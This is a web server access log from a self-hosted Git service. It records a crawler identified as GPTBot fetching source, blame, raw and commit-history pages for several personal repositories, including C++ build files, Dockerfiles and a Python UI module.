"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" -[17/Feb/2026:14:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" [Client 74.7.227.38] [Length 10710] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project" -[17/Feb/2026:14:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" -[17/Feb/2026:14:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 11079] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" -[17/Feb/2026:14:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" -[17/Feb/2026:14:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" -[17/Feb/2026:14:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10721] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" -[17/Feb/2026:14:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10512] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" -[17/Feb/2026:14:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10511] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" -[17/Feb/2026:14:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10695] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" -[17/Feb/2026:14:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10697] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" -[17/Feb/2026:14:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10672] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" -[17/Feb/2026:14:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11405] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm" -[17/Feb/2026:14:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10401] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm" -[17/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm" -[17/Feb/2026:14:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm" -[17/Feb/2026:14:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11356] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm" -[17/Feb/2026:14:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject" -[17/Feb/2026:14:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode" -[17/Feb/2026:14:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10423] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10419] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" [Client 74.7.227.38] [Length 2179790] [Gzip 21.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" -[17/Feb/2026:14:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10483] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:14:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10485] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:14:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" -[17/Feb/2026:14:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" [Client 74.7.227.38] [Length 34489] [Gzip 14.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/ui_main.py" -[17/Feb/2026:14:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject" [Client 74.7.227.38] [Length 10711] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" -[17/Feb/2026:14:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" -[17/Feb/2026:14:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 10114] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:14:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=source" [Client 74.7.227.38] [Length 11591] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" -[17/Feb/2026:14:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" -[17/Feb/2026:14:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=source" [Client 74.7.227.38] [Length 11591] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" -[17/Feb/2026:14:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile" -[17/Feb/2026:14:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11259] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21044] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21047] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11258] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 